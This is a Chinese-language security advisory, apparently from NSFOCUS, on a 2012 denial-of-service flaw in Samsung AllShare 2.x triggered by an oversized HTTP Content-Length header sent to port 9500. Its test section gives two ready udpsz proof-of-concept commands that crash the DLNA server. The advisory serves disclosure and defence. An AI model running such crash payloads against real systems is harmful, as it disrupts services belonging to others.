安全研究
安全漏洞
Samsung AllShare HTTP标头处理拒绝服务漏洞
发布日期:2012-06-19
更新日期:2012-06-19
受影响系统:Samsung AllShare 2.x
描述:
AllShare软件可使PC运行许多AllShare服务,通过本地网络回放流可在PC和其他设备之间共享视频、图片和音乐。
Samsung AllShare在处理HTTP标头时,libpin3_dll.dll模块中存在空指针引用错误,如果"Content-Length"值是介于4294967262和4294967293之间,会在MSVCR90.calloc中造成意外。本地攻击者通过在"Content-Length"标头中包含较大的值并发送到TCP端口9500,可利用此漏洞造成DLNA服务器的拒绝服务。该漏洞位于lupin3 (libpin3)库内。
<*来源:Luigi Auriemma (
aluigi@pivx.com)
链接:
http://secunia.com/advisories/49209/
http://aluigi.altervista.org/adv/allshare_1-adv.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://aluigi.org/testz/udpsz.zip
udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1
or
udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 4294967293\r\n\r\n" -T SERVER 9500 -1
建议:
厂商补丁:
Samsung
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.samsung.com/浏览次数:2648
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |